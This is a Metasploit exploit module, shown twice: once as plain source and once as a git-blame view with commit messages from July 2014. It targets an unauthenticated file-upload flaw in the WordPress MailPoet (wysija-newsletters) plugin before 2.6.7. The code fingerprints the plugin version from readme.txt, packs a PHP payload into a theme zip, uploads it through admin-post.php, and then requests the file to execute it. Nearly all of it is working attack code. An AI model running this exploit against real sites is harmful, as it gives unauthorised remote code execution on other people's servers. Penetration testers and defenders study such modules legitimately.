metasploit-framework/modules/exploits/unix/webapp/wp_wysija_newsletters_uploa...

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload',
      'Description'    => %q{
          The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7
          is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme
          functionality to upload a zip file containing the payload. The plugin used the
          admin_init hook, which is also executed for unauthenticated users when accessing
          a specific URL.
      },
      'Author'         =>
        [
          'Marc-Alexandre Montpas', # initial discovery
          'Christian Mehlmauer'     # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [ ['wysija-newsletters < 2.6.7', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 1 2014'))
  end

  def create_zip_file(theme_name, payload_name)
    # the zip file must match the following:
    #  -) Exactly one folder representing the theme name
    #  -) A style.css in the theme folder
    #  -) Additional files in the folder

    content = {
      ::File.join(theme_name, 'style.css') => '',
      ::File.join(theme_name, payload_name) => payload.encoded
    }

    zip_file = Rex::Zip::Archive.new
    content.each_pair do |name, content|
      zip_file.add_file(name, content)
    end

    zip_file.pack
  end

  def check
    readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wysija-newsletters', 'readme.txt')
    res = send_request_cgi({
      'uri'    => readme_url,
      'method' => 'GET'
    })
    # no readme.txt present
    if res.nil? || res.code != 200
      return Msf::Exploit::CheckCode::Unknown
    end

    # try to extract version from readme
    # Example line:
    # Stable tag: 2.6.6
    version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]

    # readme present, but no version number
    if version.nil?
      return Msf::Exploit::CheckCode::Detected
    end

    print_status("#{peer} - Found version #{version} of the plugin")

    if Gem::Version.new(version) < Gem::Version.new('2.6.7')
      return Msf::Exploit::CheckCode::Appears
    else
      return Msf::Exploit::CheckCode::Safe
    end
  end

  def exploit
    theme_name = rand_text_alpha(10)
    payload_name = "#{rand_text_alpha(10)}.php"

    zip_content = create_zip_file(theme_name, payload_name)

    uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-post.php')

    data = Rex::MIME::Message.new
    data.add_part(zip_content, 'application/x-zip-compressed', 'binary', "form-data; name=\"my-theme\"; filename=\"#{rand_text_alpha(5)}.zip\"")
    data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
    data.add_part('themeupload', nil, nil, 'form-data; name="action"')
    data.add_part('Upload', nil, nil, 'form-data; name="submitter"')
    post_data = data.to_s

    payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name)

    print_status("#{peer} - Uploading payload to #{payload_uri}")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => uri,
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'vars_get' => { 'page' => 'wysija_campaigns', 'action' => 'themes' },
      'data'     => post_data
    })

    if res.nil? || res.code != 302 || res.headers['Location'] != 'admin.php?page=wysija_campaigns&action=themes&reload=1&redirect=1'
      fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Files to cleanup (session is dropped in the created folder):
    #   style.css
    #   the payload
    #   the theme folder (manual cleanup)
    register_files_for_cleanup('style.css', payload_name)

    print_warning("#{peer} - The theme folder #{theme_name} can not be removed. Please delete it manually.")

    print_status("#{peer} - Executing payload #{payload_uri}")
    res = send_request_cgi({
      'uri'    => payload_uri,
      'method' => 'GET'
    })
  end
end
Added wysija file upload exploit 2014-07-02 08:24:27 +00:00			`##`
			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = ExcellentRanking`

			`include Msf::HTTP::Wordpress`
Added FileDropper 2014-07-03 17:25:31 +00:00			`include Msf::Exploit::FileDropper`
Added wysija file upload exploit 2014-07-02 08:24:27 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
Small fixes for the recent WP MailPoet module Correct casing in the title Anchor the use of ::File Force body.to_s since it can be nil in corner cases 2014-07-05 18:17:23 +00:00			`'Name' => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload',`
Added wysija file upload exploit 2014-07-02 08:24:27 +00:00			`'Description' => %q{`
			`The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7`
Small fixes for the recent WP MailPoet module Correct casing in the title Anchor the use of ::File Force body.to_s since it can be nil in corner cases 2014-07-05 18:17:23 +00:00			`is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme`
Updated description 2014-07-02 08:49:28 +00:00			`functionality to upload a zip file containing the payload. The plugin used the`
Small fixes for the recent WP MailPoet module Correct casing in the title Anchor the use of ::File Force body.to_s since it can be nil in corner cases 2014-07-05 18:17:23 +00:00			`admin_init hook, which is also executed for unauthenticated users when accessing`
			`a specific URL.`
Added wysija file upload exploit 2014-07-02 08:24:27 +00:00			`},`
			`'Author' =>`
			`[`
Replaced Tab 2014-07-02 08:35:30 +00:00			`'Marc-Alexandre Montpas', # initial discovery`
Added wysija file upload exploit 2014-07-02 08:24:27 +00:00			`'Christian Mehlmauer' # metasploit module`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ]`
			`],`
			`'Privileged' => false,`
			`'Platform' => ['php'],`
			`'Arch' => ARCH_PHP,`
			`'Targets' => [ ['wysija-newsletters < 2.6.7', {}] ],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Jul 1 2014'))`
			`end`

			`def create_zip_file(theme_name, payload_name)`
			`# the zip file must match the following:`
			`# -) Exactly one folder representing the theme name`
			`# -) A style.css in the theme folder`
			`# -) Additional files in the folder`

			`content = {`
Small fixes for the recent WP MailPoet module Correct casing in the title Anchor the use of ::File Force body.to_s since it can be nil in corner cases 2014-07-05 18:17:23 +00:00			`::File.join(theme_name, 'style.css') => '',`
			`::File.join(theme_name, payload_name) => payload.encoded`
Added wysija file upload exploit 2014-07-02 08:24:27 +00:00			`}`

			`zip_file = Rex::Zip::Archive.new`
			`content.each_pair do \|name, content\|`
			`zip_file.add_file(name, content)`
			`end`
Added FileDropper 2014-07-03 17:25:31 +00:00
Added wysija file upload exploit 2014-07-02 08:24:27 +00:00			`zip_file.pack`
			`end`

			`def check`
added check method 2014-07-02 09:07:58 +00:00			`readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wysija-newsletters', 'readme.txt')`
			`res = send_request_cgi({`
			`'uri' => readme_url,`
			`'method' => 'GET'`
			`})`
implement feedback 2014-07-03 18:27:08 +00:00			`# no readme.txt present`
added check method 2014-07-02 09:07:58 +00:00			`if res.nil? \|\| res.code != 200`
Changed check method 2014-07-02 20:31:02 +00:00			`return Msf::Exploit::CheckCode::Unknown`
added check method 2014-07-02 09:07:58 +00:00			`end`

			`# try to extract version from readme`
			`# Example line:`
			`# Stable tag: 2.6.6`
Small fixes for the recent WP MailPoet module Correct casing in the title Anchor the use of ::File Force body.to_s since it can be nil in corner cases 2014-07-05 18:17:23 +00:00			`version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]`
Added wysija file upload exploit 2014-07-02 08:24:27 +00:00
added check method 2014-07-02 09:07:58 +00:00			`# readme present, but no version number`
			`if version.nil?`
Changed check method 2014-07-02 20:29:00 +00:00			`return Msf::Exploit::CheckCode::Detected`
added check method 2014-07-02 09:07:58 +00:00			`end`

			`print_status("#{peer} - Found version #{version} of the plugin")`

			`if Gem::Version.new(version) < Gem::Version.new('2.6.7')`
			`return Msf::Exploit::CheckCode::Appears`
			`else`
			`return Msf::Exploit::CheckCode::Safe`
			`end`
Added wysija file upload exploit 2014-07-02 08:24:27 +00:00			`end`

			`def exploit`
implement feedback 2014-07-03 18:27:08 +00:00			`theme_name = rand_text_alpha(10)`
			`payload_name = "#{rand_text_alpha(10)}.php"`
Added wysija file upload exploit 2014-07-02 08:24:27 +00:00
			`zip_content = create_zip_file(theme_name, payload_name)`

			`uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-post.php')`

			`data = Rex::MIME::Message.new`
implement feedback 2014-07-03 18:27:08 +00:00			`data.add_part(zip_content, 'application/x-zip-compressed', 'binary', "form-data; name=\"my-theme\"; filename=\"#{rand_text_alpha(5)}.zip\"")`
Added wysija file upload exploit 2014-07-02 08:24:27 +00:00			`data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')`
			`data.add_part('themeupload', nil, nil, 'form-data; name="action"')`
			`data.add_part('Upload', nil, nil, 'form-data; name="submitter"')`
			`post_data = data.to_s`

			`payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name)`

			`print_status("#{peer} - Uploading payload to #{payload_uri}")`
			`res = send_request_cgi({`
			`'method' => 'POST',`
			`'uri' => uri,`
			`'ctype' => "multipart/form-data; boundary=#{data.bound}",`
			`'vars_get' => { 'page' => 'wysija_campaigns', 'action' => 'themes' },`
			`'data' => post_data`
			`})`

Added FileDropper 2014-07-03 17:25:31 +00:00			`if res.nil? \|\| res.code != 302 \|\| res.headers['Location'] != 'admin.php?page=wysija_campaigns&action=themes&reload=1&redirect=1'`
Added wysija file upload exploit 2014-07-02 08:24:27 +00:00			`fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")`
			`end`

Added FileDropper 2014-07-03 17:25:31 +00:00			`# Files to cleanup (session is dropped in the created folder):`
			`# style.css`
			`# the payload`
			`# the theme folder (manual cleanup)`
			`register_files_for_cleanup('style.css', payload_name)`

Use print_warning 2014-07-03 18:38:20 +00:00			`print_warning("#{peer} - The theme folder #{theme_name} can not be removed. Please delete it manually.")`
Added FileDropper 2014-07-03 17:25:31 +00:00
Added wysija file upload exploit 2014-07-02 08:24:27 +00:00			`print_status("#{peer} - Executing payload #{payload_uri}")`
added check method 2014-07-02 09:07:58 +00:00			`res = send_request_cgi({`
Added wysija file upload exploit 2014-07-02 08:24:27 +00:00			`'uri' => payload_uri,`
			`'method' => 'GET'`
			`})`
			`end`
Small fixes for the recent WP MailPoet module Correct casing in the title Anchor the use of ::File Force body.to_s since it can be nil in corner cases 2014-07-05 18:17:23 +00:00			`end`